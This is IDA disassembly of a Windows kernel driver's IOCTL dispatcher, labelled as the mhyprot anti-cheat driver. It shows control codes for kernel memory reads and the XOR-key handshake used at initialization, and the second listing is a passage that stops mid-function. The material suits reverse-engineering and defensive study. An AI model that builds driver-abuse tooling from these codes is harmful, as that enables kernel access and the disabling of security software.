--------------------------------------------------------------------------------
/IDA/sub_FFFFF800188CD6E0.txt:
--------------------------------------------------------------------------------
  1 | PAGE:FFFFF800188CD6E0 ; =============== S U B R O U T I N E =======================================
  2 | PAGE:FFFFF800188CD6E0
  3 | PAGE:FFFFF800188CD6E0
  4 | PAGE:FFFFF800188CD6E0 sub_FFFFF800188CD6E0 proc near          ; DATA XREF: sub_FFFFF800189F277D+130↓o
  5 | PAGE:FFFFF800188CD6E0                                         ; .upx0:FFFFF800189F29C4↓o ...
  6 | PAGE:FFFFF800188CD6E0
  7 | PAGE:FFFFF800188CD6E0 var_1A8         = qword ptr -1A8h
  8 | PAGE:FFFFF800188CD6E0 var_198         = byte ptr -198h
  9 | PAGE:FFFFF800188CD6E0 var_18          = byte ptr -18h
 10 | PAGE:FFFFF800188CD6E0 arg_0           = qword ptr  8
 11 | PAGE:FFFFF800188CD6E0 arg_8           = dword ptr  10h
 12 | PAGE:FFFFF800188CD6E0 P               = qword ptr  18h
 13 | PAGE:FFFFF800188CD6E0 arg_18          = qword ptr  20h
 14 | PAGE:FFFFF800188CD6E0
 15 | PAGE:FFFFF800188CD6E0                 mov     [rsp+arg_0], rbx
 16 | PAGE:FFFFF800188CD6E5                 mov     [rsp+arg_18], rbp
 17 | PAGE:FFFFF800188CD6EA                 push    rsi
 18 | PAGE:FFFFF800188CD6EB                 push    rdi
 19 | PAGE:FFFFF800188CD6EC                 push    r14
 20 | PAGE:FFFFF800188CD6EE                 sub     rsp, 1B0h
 21 | PAGE:FFFFF800188CD6F5                 mov     rax, [rdx+0B8h]
 22 | PAGE:FFFFF800188CD6FC                 mov     rbp, rdx
 23 | PAGE:FFFFF800188CD6FF                 mov     rdi, [rdx+18h]
 24 | PAGE:FFFFF800188CD703                 mov     ecx, [rax+18h]
 25 | PAGE:FFFFF800188CD706                 mov     r8d, [rax+10h]
 26 | PAGE:FFFFF800188CD70A                 mov     esi, [rax+8]
 27 | PAGE:FFFFF800188CD70D                 and     qword ptr [rdx+38h], 0
 28 | PAGE:FFFFF800188CD712                 cmp     ecx, 80104000h
 29 | PAGE:FFFFF800188CD718                 jnz     short loc_FFFFF800188CD737
 30 | PAGE:FFFFF800188CD71A                 mov     edx, r8d
 31 | PAGE:FFFFF800188CD71D                 mov     rcx, rdi
 32 | PAGE:FFFFF800188CD720                 call    sub_FFFFF800188C21EC
 33 | PAGE:FFFFF800188CD725                 mov     cs:dword_FFFFF800188CA110, eax
 34 | PAGE:FFFFF800188CD72B                 neg     eax
 35 | PAGE:FFFFF800188CD72D                 sbb     rcx, rcx
 36 | PAGE:FFFFF800188CD730                 and     ecx, 1
 37 | PAGE:FFFFF800188CD733                 mov     [rdi], ecx
 38 | PAGE:FFFFF800188CD735                 jmp     short loc_FFFFF800188CD75C
 39 | PAGE:FFFFF800188CD737 ; ---------------------------------------------------------------------------
 40 | PAGE:FFFFF800188CD737
 41 | PAGE:FFFFF800188CD737 loc_FFFFF800188CD737:                   ; CODE XREF: sub_FFFFF800188CD6E0+38↑j
 42 | PAGE:FFFFF800188CD737                 lea     eax, [rcx+7FEEC000h]
 43 | PAGE:FFFFF800188CD73D                 mov     edx, 80134000h
 44 | PAGE:FFFFF800188CD742                 test    eax, 0FFFCFFFFh
 45 | PAGE:FFFFF800188CD747                 jnz     short loc_FFFFF800188CD751
 46 | PAGE:FFFFF800188CD749                 cmp     ecx, edx
 47 | PAGE:FFFFF800188CD74B                 jnz     loc_FFFFF800188CDA4F
 48 | PAGE:FFFFF800188CD751
 49 | PAGE:FFFFF800188CD751 loc_FFFFF800188CD751:                   ; CODE XREF: sub_FFFFF800188CD6E0+67↑j
 50 | PAGE:FFFFF800188CD751                 cmp     ecx, edx
 51 | PAGE:FFFFF800188CD753                 jnz     short loc_FFFFF800188CD766
 52 | PAGE:FFFFF800188CD755                 call    sub_FFFFF800188C2314
 53 | PAGE:FFFFF800188CD75A                 mov     [rdi], eax
 54 | PAGE:FFFFF800188CD75C
 55 | PAGE:FFFFF800188CD75C loc_FFFFF800188CD75C:                   ; CODE XREF: sub_FFFFF800188CD6E0+55↑j
 56 | PAGE:FFFFF800188CD75C                 mov     esi, 4
 57 | PAGE:FFFFF800188CD761                 jmp     loc_FFFFF800188CDA4F
 58 | PAGE:FFFFF800188CD766 ; ---------------------------------------------------------------------------
 59 | PAGE:FFFFF800188CD766
 60 | PAGE:FFFFF800188CD766 loc_FFFFF800188CD766:                   ; CODE XREF: sub_FFFFF800188CD6E0+73↑j
 61 | PAGE:FFFFF800188CD766                 cmp     ecx, 82054000h
 62 | PAGE:FFFFF800188CD76C                 jnz     short loc_FFFFF800188CD77E
 63 | PAGE:FFFFF800188CD76E                 mov     ecx, [rdi]
 64 | PAGE:FFFFF800188CD770                 lea     rdx, [rdi+4]
 65 | PAGE:FFFFF800188CD774                 mov     r8d, [rdx]
 66 | PAGE:FFFFF800188CD777                 call    sub_FFFFF800188C26D0
 67 | PAGE:FFFFF800188CD77C                 jmp     short loc_FFFFF800188CD7C1
 68 | PAGE:FFFFF800188CD77E ; ---------------------------------------------------------------------------
 69 | PAGE:FFFFF800188CD77E
 70 | PAGE:FFFFF800188CD77E loc_FFFFF800188CD77E:                   ; CODE XREF: sub_FFFFF800188CD6E0+8C↑j
 71 | PAGE:FFFFF800188CD77E                 cmp     ecx, 83024000h
 72 | PAGE:FFFFF800188CD784                 jnz     short loc_FFFFF800188CD794
 73 | PAGE:FFFFF800188CD786                 lea     rcx, [rdi+4]
 74 | PAGE:FFFFF800188CD78A                 mov     rdx, rdi
 75 | PAGE:FFFFF800188CD78D                 call    sub_FFFFF800188C62EC
 76 | PAGE:FFFFF800188CD792                 jmp     short loc_FFFFF800188CD7C1
 77 | PAGE:FFFFF800188CD794 ; ---------------------------------------------------------------------------
 78 | PAGE:FFFFF800188CD794
 79 | PAGE:FFFFF800188CD794 loc_FFFFF800188CD794:                   ; CODE XREF: sub_FFFFF800188CD6E0+A4↑j
 80 | PAGE:FFFFF800188CD794                 cmp     ecx, 83074000h
 81 | PAGE:FFFFF800188CD79A                 jnz     short loc_FFFFF800188CD7A9 ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
 82 | PAGE:FFFFF800188CD79C                 mov     edx, [rdi]
 83 | PAGE:FFFFF800188CD79E                 lea     rcx, [rdi+4]
 84 | PAGE:FFFFF800188CD7A2                 call    sub_FFFFF800188C5F18
 85 | PAGE:FFFFF800188CD7A7                 jmp     short loc_FFFFF800188CD7C1
 86 | PAGE:FFFFF800188CD7A9 ; ---------------------------------------------------------------------------
 87 | PAGE:FFFFF800188CD7A9
 88 | PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9:                   ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
 89 | PAGE:FFFFF800188CD7A9                 cmp     ecx, 83064000h  ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
 90 | PAGE:FFFFF800188CD7AF                 jnz     short loc_FFFFF800188CD7C8
 91 | PAGE:FFFFF800188CD7B1                 mov     rdx, [rdi]
 92 | PAGE:FFFFF800188CD7B4                 lea     rcx, [rdi+4]
 93 | PAGE:FFFFF800188CD7B8                 mov     r8d, [rdi+8]
 94 | PAGE:FFFFF800188CD7BC                 call    sub_FFFFF800188C63A8
 95 | PAGE:FFFFF800188CD7C1
 96 | PAGE:FFFFF800188CD7C1 loc_FFFFF800188CD7C1:                   ; CODE XREF: sub_FFFFF800188CD6E0+9C↑j
 97 | PAGE:FFFFF800188CD7C1                                         ; sub_FFFFF800188CD6E0+B2↑j ...
 98 | PAGE:FFFFF800188CD7C1                 mov     [rdi], eax
 99 | PAGE:FFFFF800188CD7C3                 jmp     loc_FFFFF800188CDA4F
100 | PAGE:FFFFF800188CD7C8 ; ---------------------------------------------------------------------------
101 | PAGE:FFFFF800188CD7C8
102 | PAGE:FFFFF800188CD7C8 loc_FFFFF800188CD7C8:                   ; CODE XREF: sub_FFFFF800188CD6E0+CF↑j
103 | PAGE:FFFFF800188CD7C8                 cmp     ecx, 82074000h
104 | PAGE:FFFFF800188CD7CE                 jnz     loc_FFFFF800188CD868
105 | PAGE:FFFFF800188CD7D4                 cmp     r8d, 4
106 | PAGE:FFFFF800188CD7D8                 jb      loc_FFFFF800188CDA4F
107 | PAGE:FFFFF800188CD7DE                 cmp     esi, 38h ; '8'
108 | PAGE:FFFFF800188CD7E1                 jb      loc_FFFFF800188CDA4F
109 | PAGE:FFFFF800188CD7E7                 test    rdi, rdi
110 | PAGE:FFFFF800188CD7EA                 jz      loc_FFFFF800188CDA4F
111 | PAGE:FFFFF800188CD7F0                 mov     r8d, 4746544Dh  ; Tag
112 | PAGE:FFFFF800188CD7F6                 mov     rdx, rsi        ; NumberOfBytes
113 | PAGE:FFFFF800188CD7F9                 mov     ecx, 1          ; PoolType
114 | PAGE:FFFFF800188CD7FE                 call    cs:ExAllocatePoolWithTag
115 | PAGE:FFFFF800188CD804                 mov     r14, rax
116 | PAGE:FFFFF800188CD807                 lea     rcx, [rsi-8]
117 | PAGE:FFFFF800188CD80B                 mov     rax, 0AAAAAAAAAAAAAAABh
118 | PAGE:FFFFF800188CD815                 mul     rcx
119 | PAGE:FFFFF800188CD818                 shr     rdx, 5
120 | PAGE:FFFFF800188CD81C                 mov     ecx, edx
121 | PAGE:FFFFF800188CD81E                 mov     rdx, r14
122 | PAGE:FFFFF800188CD821                 mov     [r14], rcx
123 | PAGE:FFFFF800188CD824                 mov     rcx, rdi
124 | PAGE:FFFFF800188CD827                 call    sub_FFFFF800188C32B0
125 | PAGE:FFFFF800188CD82C                 mov     [rbp+30h], eax
126 | PAGE:FFFFF800188CD82F                 mov     rcx, [r14]
127 | PAGE:FFFFF800188CD832                 test    eax, eax
128 | PAGE:FFFFF800188CD834                 js      short loc_FFFFF800188CD853
129 | PAGE:FFFFF800188CD836                 lea     r8, [rcx+rcx*2]
130 | PAGE:FFFFF800188CD83A                 shl     r8, 4
131 | PAGE:FFFFF800188CD83E                 add     r8, 8
132 | PAGE:FFFFF800188CD842
133 | PAGE:FFFFF800188CD842 loc_FFFFF800188CD842:                   ; CODE XREF: sub_FFFFF800188CD6E0+1FC↓j
134 | PAGE:FFFFF800188CD842                 mov     rdx, r14
135 | PAGE:FFFFF800188CD845                 mov     [rbp+38h], r8
136 | PAGE:FFFFF800188CD849                 mov     rcx, rdi
137 | PAGE:FFFFF800188CD84C                 call    sub_FFFFF800188C75C0
138 | PAGE:FFFFF800188CD851                 jmp     short loc_FFFFF800188CD85B
139 | PAGE:FFFFF800188CD853 ; ---------------------------------------------------------------------------
140 | PAGE:FFFFF800188CD853
141 | PAGE:FFFFF800188CD853 loc_FFFFF800188CD853:                   ; CODE XREF: sub_FFFFF800188CD6E0+154↑j
142 | PAGE:FFFFF800188CD853                 mov     esi, 8
143 | PAGE:FFFFF800188CD858                 mov     [rdi], rcx
144 | PAGE:FFFFF800188CD85B
145 | PAGE:FFFFF800188CD85B loc_FFFFF800188CD85B:                   ; CODE XREF: sub_FFFFF800188CD6E0+171↑j
146 | PAGE:FFFFF800188CD85B                                         ; sub_FFFFF800188CD6E0+208↓j
147 | PAGE:FFFFF800188CD85B                 mov     edx, 4746544Dh
148 | PAGE:FFFFF800188CD860                 mov     rcx, r14
149 | PAGE:FFFFF800188CD863                 jmp     loc_FFFFF800188CDA49
150 | PAGE:FFFFF800188CD868 ; ---------------------------------------------------------------------------
151 | PAGE:FFFFF800188CD868
152 | PAGE:FFFFF800188CD868 loc_FFFFF800188CD868:                   ; CODE XREF: sub_FFFFF800188CD6E0+EE↑j
153 | PAGE:FFFFF800188CD868                 cmp     ecx, 82104000h
154 | PAGE:FFFFF800188CD86E                 jnz     short loc_FFFFF800188CD8ED
155 | PAGE:FFFFF800188CD870                 cmp     r8d, 28h ; '('
156 | PAGE:FFFFF800188CD874                 jb      loc_FFFFF800188CDA4F
157 | PAGE:FFFFF800188CD87A                 cmp     esi, 20h ; ' '
158 | PAGE:FFFFF800188CD87D                 jb      loc_FFFFF800188CDA4F
159 | PAGE:FFFFF800188CD883                 test    rdi, rdi
160 | PAGE:FFFFF800188CD886                 jz      loc_FFFFF800188CDA4F
161 | PAGE:FFFFF800188CD88C                 mov     r8d, 4746544Dh  ; Tag
162 | PAGE:FFFFF800188CD892                 mov     rdx, rsi        ; NumberOfBytes
163 | PAGE:FFFFF800188CD895                 mov     ecx, 1          ; PoolType
164 | PAGE:FFFFF800188CD89A                 call    cs:ExAllocatePoolWithTag
165 | PAGE:FFFFF800188CD8A0                 mov     r14, rax
166 | PAGE:FFFFF800188CD8A3                 lea     rcx, [rsi-4]
167 | PAGE:FFFFF800188CD8A7                 mov     rax, 0AAAAAAAAAAAAAAABh
168 | PAGE:FFFFF800188CD8B1                 mul     rcx
169 | PAGE:FFFFF800188CD8B4                 mov     rcx, rdi
170 | PAGE:FFFFF800188CD8B7                 shr     rdx, 4
171 | PAGE:FFFFF800188CD8BB                 mov     [r14], edx
172 | PAGE:FFFFF800188CD8BE                 mov     rdx, r14
173 | PAGE:FFFFF800188CD8C1                 call    sub_FFFFF800188C377C
174 | PAGE:FFFFF800188CD8C6                 mov     [rbp+30h], eax
175 | PAGE:FFFFF800188CD8C9                 mov     ecx, [r14]
176 | PAGE:FFFFF800188CD8CC                 test    eax, eax
177 | PAGE:FFFFF800188CD8CE                 js      short loc_FFFFF800188CD8E1
178 | PAGE:FFFFF800188CD8D0                 lea     rcx, [rcx+rcx*2]
179 | PAGE:FFFFF800188CD8D4                 lea     r8, ds:4[rcx*8]
180 | PAGE:FFFFF800188CD8DC                 jmp     loc_FFFFF800188CD842
181 | PAGE:FFFFF800188CD8E1 ; ---------------------------------------------------------------------------
182 | PAGE:FFFFF800188CD8E1
183 | PAGE:FFFFF800188CD8E1 loc_FFFFF800188CD8E1:                   ; CODE XREF: sub_FFFFF800188CD6E0+1EE↑j
184 | PAGE:FFFFF800188CD8E1                 mov     esi, 4
185 | PAGE:FFFFF800188CD8E6                 mov     [rdi], ecx
186 | PAGE:FFFFF800188CD8E8                 jmp     loc_FFFFF800188CD85B
187 | PAGE:FFFFF800188CD8ED ; ---------------------------------------------------------------------------
188 | PAGE:FFFFF800188CD8ED
189 | PAGE:FFFFF800188CD8ED loc_FFFFF800188CD8ED:                   ; CODE XREF: sub_FFFFF800188CD6E0+18E↑j
190 | PAGE:FFFFF800188CD8ED                 cmp     ecx, 82094000h
191 | PAGE:FFFFF800188CD8F3                 jnz     short loc_FFFFF800188CD8FD
192 | PAGE:FFFFF800188CD8F5                 and     dword ptr [rdi], 0
193 | PAGE:FFFFF800188CD8F8                 jmp     loc_FFFFF800188CDA4F
194 | PAGE:FFFFF800188CD8FD ; ---------------------------------------------------------------------------
195 | PAGE:FFFFF800188CD8FD
196 | PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD:                   ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
197 | PAGE:FFFFF800188CD8FD                 cmp     ecx, 80034000h  ; MHYPROT_IOCTL_INITIALIZE
198 | PAGE:FFFFF800188CD903                 jnz     short loc_FFFFF800188CD984
199 | PAGE:FFFFF800188CD905                 cmp     r8d, 10h
200 | PAGE:FFFFF800188CD909                 jnz     loc_FFFFF800188CDA4F
201 | PAGE:FFFFF800188CD90F                 mov     rax, 0EBBAAEF4FFF89042h
202 | PAGE:FFFFF800188CD919                 xor     [rdi+8], rax
203 | PAGE:FFFFF800188CD91D                 mov     rax, [rdi+8]
204 | PAGE:FFFFF800188CD921                 xor     [rdi], rax
205 | PAGE:FFFFF800188CD924                 cmp     dword ptr [rdi+4], 0BAEBAEECh
206 | PAGE:FFFFF800188CD92B                 jnz     loc_FFFFF800188CDA4F
207 | PAGE:FFFFF800188CD931                 mov     ecx, [rdi]
208 | PAGE:FFFFF800188CD933                 call    sub_FFFFF800188C51A8
209 | PAGE:FFFFF800188CD938                 cmp     dword ptr cs:qword_FFFFF800188CA108, 0
210 | PAGE:FFFFF800188CD93F                 jnz     short loc_FFFFF800188CD97D
211 | PAGE:FFFFF800188CD941                 mov     rdx, [rdi+8]
212 | PAGE:FFFFF800188CD945                 lea     rcx, xmmword_FFFFF800188CA0E8
213 | PAGE:FFFFF800188CD94C                 call    sub_FFFFF800188C301C
214 | PAGE:FFFFF800188CD951                 mov     ebx, 7
215 | PAGE:FFFFF800188CD956
216 | PAGE:FFFFF800188CD956 loc_FFFFF800188CD956:                   ; CODE XREF: sub_FFFFF800188CD6E0+293↓j
217 | PAGE:FFFFF800188CD956                 lea     rcx, xmmword_FFFFF800188CA0E8
218 | PAGE:FFFFF800188CD95D                 call    sub_FFFFF800188C2EB0
219 | PAGE:FFFFF800188CD962                 mov     [rdi], rax
220 | PAGE:FFFFF800188CD965                 mov     dword ptr cs:qword_FFFFF800188CA108, 1
221 | PAGE:FFFFF800188CD96F                 sub     rbx, 1
222 | PAGE:FFFFF800188CD973                 jnz     short loc_FFFFF800188CD956
223 | PAGE:FFFFF800188CD975                 lea     esi, [rbx+8]
224 | PAGE:FFFFF800188CD978                 jmp     loc_FFFFF800188CDA4F
225 | PAGE:FFFFF800188CD97D ; ---------------------------------------------------------------------------
226 | PAGE:FFFFF800188CD97D
227 | PAGE:FFFFF800188CD97D loc_FFFFF800188CD97D:                   ; CODE XREF: sub_FFFFF800188CD6E0+25F↑j
228 | PAGE:FFFFF800188CD97D                 xor     esi, esi
229 | PAGE:FFFFF800188CD97F                 jmp     loc_FFFFF800188CDA4F
230 | PAGE:FFFFF800188CD984 ; ---------------------------------------------------------------------------
231 | PAGE:FFFFF800188CD984
232 | PAGE:FFFFF800188CD984 loc_FFFFF800188CD984:                   ; CODE XREF: sub_FFFFF800188CD6E0+223↑j
233 | PAGE:FFFFF800188CD984                 cmp     ecx, 81134000h
234 | PAGE:FFFFF800188CD98A                 jz      loc_FFFFF800188CDA4F
235 | PAGE:FFFFF800188CD990                 cmp     ecx, 81144000h
236 | PAGE:FFFFF800188CD996                 jnz     short loc_FFFFF800188CD9DE
237 | PAGE:FFFFF800188CD998                 mov     ecx, [rdi]
238 | PAGE:FFFFF800188CD99A                 lea     rdx, [rsp+1C8h+var_198]
239 | PAGE:FFFFF800188CD99F                 call    sub_FFFFF800188C6654
240 | PAGE:FFFFF800188CD9A4                 test    eax, eax
241 | PAGE:FFFFF800188CD9A6                 jns     short loc_FFFFF800188CD9B2
242 | PAGE:FFFFF800188CD9A8                 mov     esi, 4
243 | PAGE:FFFFF800188CD9AD                 jmp     loc_FFFFF800188CD7C1
244 | PAGE:FFFFF800188CD9B2 ; ---------------------------------------------------------------------------
245 | PAGE:FFFFF800188CD9B2
246 | PAGE:FFFFF800188CD9B2 loc_FFFFF800188CD9B2:                   ; CODE XREF: sub_FFFFF800188CD6E0+2C6↑j
247 | PAGE:FFFFF800188CD9B2                 lea     esi, [rax+rax*2]
248 | PAGE:FFFFF800188CD9B5                 movsxd  rcx, eax
249 | PAGE:FFFFF800188CD9B8                 shl     esi, 3
250 | PAGE:FFFFF800188CD9BB                 test    eax, eax
251 | PAGE:FFFFF800188CD9BD                 jle     loc_FFFFF800188CDA4F
252 | PAGE:FFFFF800188CD9C3                 lea     r8, [rcx+rcx*2]
253 | PAGE:FFFFF800188CD9C7                 mov     rcx, rdi
254 | PAGE:FFFFF800188CD9CA                 shl     r8, 3
255 | PAGE:FFFFF800188CD9CE                 lea     rdx, [rsp+1C8h+var_198]
256 | PAGE:FFFFF800188CD9D3                 and     r8, 0FFFFFFFFFFFFFFF8h
257 | PAGE:FFFFF800188CD9D7                 call    sub_FFFFF800188C75C0
258 | PAGE:FFFFF800188CD9DC                 jmp     short loc_FFFFF800188CDA4F
259 | PAGE:FFFFF800188CD9DE ; ---------------------------------------------------------------------------
260 | PAGE:FFFFF800188CD9DE
261 | PAGE:FFFFF800188CD9DE loc_FFFFF800188CD9DE:                   ; CODE XREF: sub_FFFFF800188CD6E0+2B6↑j
262 | PAGE:FFFFF800188CD9DE                 and     [rsp+1C8h+P], 0
263 | PAGE:FFFFF800188CD9E7                 lea     rax, [rsp+1C8h+arg_8]
264 | PAGE:FFFFF800188CD9EF                 and     [rsp+1C8h+arg_8], 0
265 | PAGE:FFFFF800188CD9F7                 lea     r9, [rsp+1C8h+P]
266 | PAGE:FFFFF800188CD9FF                 mov     rdx, rdi
267 | PAGE:FFFFF800188CDA02                 mov     [rsp+1C8h+var_1A8], rax
268 | PAGE:FFFFF800188CDA07                 call    sub_FFFFF800188CD000
269 | PAGE:FFFFF800188CDA0C                 test    al, al
270 | PAGE:FFFFF800188CDA0E                 jz      short loc_FFFFF800188CDA4F
271 | PAGE:FFFFF800188CDA10                 mov     eax, [rsp+1C8h+arg_8]
272 | PAGE:FFFFF800188CDA17                 cmp     esi, eax
273 | PAGE:FFFFF800188CDA19                 mov     rbx, [rsp+1C8h+P]
274 | PAGE:FFFFF800188CDA21                 cmovb   eax, esi
275 | PAGE:FFFFF800188CDA24                 mov     [rsp+1C8h+arg_8], eax
276 | PAGE:FFFFF800188CDA2B                 test    rbx, rbx
277 | PAGE:FFFFF800188CDA2E                 jz      short loc_FFFFF800188CDA4F
278 | PAGE:FFFFF800188CDA30                 test    eax, eax
279 | PAGE:FFFFF800188CDA32                 jz      short loc_FFFFF800188CDA4F
280 | PAGE:FFFFF800188CDA34                 mov     r8d, eax
281 | PAGE:FFFFF800188CDA37                 mov     rdx, rbx
282 | PAGE:FFFFF800188CDA3A                 mov     rcx, rdi
283 | PAGE:FFFFF800188CDA3D                 mov     esi, eax
284 | PAGE:FFFFF800188CDA3F                 call    sub_FFFFF800188C75C0
285 | PAGE:FFFFF800188CDA44                 xor     edx, edx        ; Tag
286 | PAGE:FFFFF800188CDA46                 mov     rcx, rbx        ; P
287 | PAGE:FFFFF800188CDA49
288 | PAGE:FFFFF800188CDA49 loc_FFFFF800188CDA49:                   ; CODE XREF: sub_FFFFF800188CD6E0+183↑j
289 | PAGE:FFFFF800188CDA49                 call    cs:ExFreePoolWithTag
290 | PAGE:FFFFF800188CDA4F
291 | PAGE:FFFFF800188CDA4F loc_FFFFF800188CDA4F:                   ; CODE XREF: sub_FFFFF800188CD6E0+6B↑j
292 | PAGE:FFFFF800188CDA4F                                         ; sub_FFFFF800188CD6E0+81↑j ...
293 | PAGE:FFFFF800188CDA4F                 mov     eax, esi
294 | PAGE:FFFFF800188CDA51                 xor     edx, edx        ; PriorityBoost
295 | PAGE:FFFFF800188CDA53                 mov     [rbp+38h], rax
296 | PAGE:FFFFF800188CDA57                 mov     rcx, rbp        ; Irp
297 | PAGE:FFFFF800188CDA5A                 and     dword ptr [rbp+30h], 0
298 | PAGE:FFFFF800188CDA5E                 call    cs:IofCompleteRequest
299 | PAGE:FFFFF800188CDA64                 lea     r11, [rsp+1C8h+var_18]
300 | PAGE:FFFFF800188CDA6C                 xor     eax, eax
301 | PAGE:FFFFF800188CDA6E                 mov     rbx, [r11+20h]
302 | PAGE:FFFFF800188CDA72                 mov     rbp, [r11+38h]
303 | PAGE:FFFFF800188CDA76                 mov     rsp, r11
304 | PAGE:FFFFF800188CDA79                 pop     r14
305 | PAGE:FFFFF800188CDA7B                 pop     rdi
306 | PAGE:FFFFF800188CDA7C                 pop     rsi
307 | PAGE:FFFFF800188CDA7D                 retn
308 | PAGE:FFFFF800188CDA7D sub_FFFFF800188CD6E0 endp
309 | 


--------------------------------------------------------------------------------
/IDA/sub_FFFFF800188CD000.txt:
--------------------------------------------------------------------------------
  1 | PAGE:FFFFF800188CD000 ; =============== S U B R O U T I N E =======================================
  2 | PAGE:FFFFF800188CD000
  3 | PAGE:FFFFF800188CD000 ; Attributes: bp-based frame fpd=1D0h
  4 | PAGE:FFFFF800188CD000
  5 | PAGE:FFFFF800188CD000 sub_FFFFF800188CD000 proc near          ; CODE XREF: sub_FFFFF800188CD6E0+327↓p
  6 | PAGE:FFFFF800188CD000                                         ; DATA XREF: .upx0:FFFFF800189F301C↓o
  7 | PAGE:FFFFF800188CD000
  8 | PAGE:FFFFF800188CD000 var_250         = xmmword ptr -250h
  9 | PAGE:FFFFF800188CD000 var_240         = qword ptr -240h
 10 | PAGE:FFFFF800188CD000 var_230         = byte ptr -230h
 11 | PAGE:FFFFF800188CD000 var_s0          = qword ptr  0
 12 | PAGE:FFFFF800188CD000 arg_8           = qword ptr  18h
 13 | PAGE:FFFFF800188CD000 arg_10          = xmmword ptr  20h
 14 | PAGE:FFFFF800188CD000 arg_20          = qword ptr  30h
 15 | PAGE:FFFFF800188CD000 arg_30          = qword ptr  40h
 16 | PAGE:FFFFF800188CD000 arg_40          = xmmword ptr  50h
 17 | PAGE:FFFFF800188CD000 arg_280         = byte ptr  290h
 18 | PAGE:FFFFF800188CD000
 19 | PAGE:FFFFF800188CD000 ; FUNCTION CHUNK AT .upx0:FFFFF800189F2672 SIZE 0000005C BYTES
 20 | PAGE:FFFFF800188CD000
 21 | PAGE:FFFFF800188CD000                 mov     [rsp+8], rbx
 22 | PAGE:FFFFF800188CD005                 mov     [rsp-8+arg_8], rsi
 23 | PAGE:FFFFF800188CD00A                 push    rbp
 24 | PAGE:FFFFF800188CD00B                 push    rdi
 25 | PAGE:FFFFF800188CD00C                 push    r12
 26 | PAGE:FFFFF800188CD00E                 push    r14
 27 | PAGE:FFFFF800188CD010                 push    r15
 28 | PAGE:FFFFF800188CD012                 lea     rbp, [rsp-1B0h]
 29 | PAGE:FFFFF800188CD01A                 sub     rsp, 2B0h
 30 | PAGE:FFFFF800188CD021                 mov     ebx, ecx
 31 | PAGE:FFFFF800188CD023                 mov     r14, r9
 32 | PAGE:FFFFF800188CD026                 lea     rcx, qword_FFFFF800188CDB00
 33 | PAGE:FFFFF800188CD02D                 mov     esi, r8d
 34 | PAGE:FFFFF800188CD030                 mov     r12, rdx
 35 | PAGE:FFFFF800188CD033                 jmp     loc_FFFFF800189F25E7
 36 | PAGE:FFFFF800188CD033 ; ---------------------------------------------------------------------------
 37 | PAGE:FFFFF800188CD038                 db 6Bh dup(0CCh)
 38 | PAGE:FFFFF800188CD0A3 ; ---------------------------------------------------------------------------
 39 | PAGE:FFFFF800188CD0A3
 40 | PAGE:FFFFF800188CD0A3 loc_FFFFF800188CD0A3:                   ; CODE XREF: sub_FFFFF800189F2541+6D↓j
 41 | PAGE:FFFFF800188CD0A3                 test    dil, dil
 42 | PAGE:FFFFF800188CD0A6                 jz      short loc_FFFFF800188CD0AF
 43 | PAGE:FFFFF800188CD0A8                 xor     al, al
 44 | PAGE:FFFFF800188CD0AA                 jmp     loc_FFFFF800188CD642
 45 | PAGE:FFFFF800188CD0AF ; ---------------------------------------------------------------------------
 46 | PAGE:FFFFF800188CD0AF
 47 | PAGE:FFFFF800188CD0AF loc_FFFFF800188CD0AF:                   ; CODE XREF: sub_FFFFF800188CD000+A6↑j
 48 | PAGE:FFFFF800188CD0AF                 mov     eax, 81104000h
 49 | PAGE:FFFFF800188CD0B4                 cmp     ebx, eax
 50 | PAGE:FFFFF800188CD0B6                 ja      loc_FFFFF800188CD352
 51 | PAGE:FFFFF800188CD0BC                 jz      loc_FFFFF800188CD32E
 52 | PAGE:FFFFF800188CD0C2                 mov     eax, 81054000h
 53 | PAGE:FFFFF800188CD0C7                 cmp     ebx, eax
 54 | PAGE:FFFFF800188CD0C9                 ja      loc_FFFFF800188CD2B9
 55 | PAGE:FFFFF800188CD0CF                 jz      loc_FFFFF800188CD22D
 56 | PAGE:FFFFF800188CD0D5                 cmp     ebx, 80024000h
 57 | PAGE:FFFFF800188CD0DB                 jz      loc_FFFFF800188CD209
 58 | PAGE:FFFFF800188CD0E1                 cmp     ebx, 81004000h
 59 | PAGE:FFFFF800188CD0E7                 jz      loc_FFFFF800188CD1D9
 60 | PAGE:FFFFF800188CD0ED                 cmp     ebx, 81014000h
 61 | PAGE:FFFFF800188CD0F3                 jz      loc_FFFFF800188CD1B9
 62 | PAGE:FFFFF800188CD0F9                 cmp     ebx, 81034000h
 63 | PAGE:FFFFF800188CD0FF                 jz      short loc_FFFFF800188CD16C
 64 | PAGE:FFFFF800188CD101                 cmp     ebx, 81044000h
 65 | PAGE:FFFFF800188CD107                 jnz     loc_FFFFF800188CD62B
 66 | PAGE:FFFFF800188CD10D                 mov     rax, [rsp+30h]
 67 | PAGE:FFFFF800188CD112                 lea     rcx, [rbp+1D0h+var_230]
 68 | PAGE:FFFFF800188CD116                 mov     edi, 208h
 69 | PAGE:FFFFF800188CD11B                 xor     edx, edx
 70 | PAGE:FFFFF800188CD11D                 mov     r8d, edi
 71 | PAGE:FFFFF800188CD120                 mov     ebx, [rax]
 72 | PAGE:FFFFF800188CD122                 call    sub_FFFFF800188C7900
 73 | PAGE:FFFFF800188CD127                 mov     r8d, 104h
 74 | PAGE:FFFFF800188CD12D                 lea     rdx, [rbp+1D0h+var_230]
 75 | PAGE:FFFFF800188CD131                 mov     ecx, ebx
 76 | PAGE:FFFFF800188CD133                 call    sub_FFFFF800188C3BFC
 77 | PAGE:FFFFF800188CD138                 movups  xmm0, cs:xmmword_FFFFF800188CA0E8
 78 | PAGE:FFFFF800188CD13F                 lea     rax, [rsp+20h+arg_40]
 79 | PAGE:FFFFF800188CD144                 mov     edx, edi
 80 | PAGE:FFFFF800188CD146                 movups  xmm1, cs:xmmword_FFFFF800188CA0F8
 81 | PAGE:FFFFF800188CD14D                 lea     rcx, [rbp+1D0h+var_230]
 82 | PAGE:FFFFF800188CD151                 movaps  [rsp+20h+arg_40], xmm0
 83 | PAGE:FFFFF800188CD156                 movsd   xmm0, cs:qword_FFFFF800188CA108
 84 | PAGE:FFFFF800188CD15E                 movsd   [rbp+1D0h+var_240], xmm0
 85 | PAGE:FFFFF800188CD163                 movaps  [rbp+1D0h+var_250], xmm1
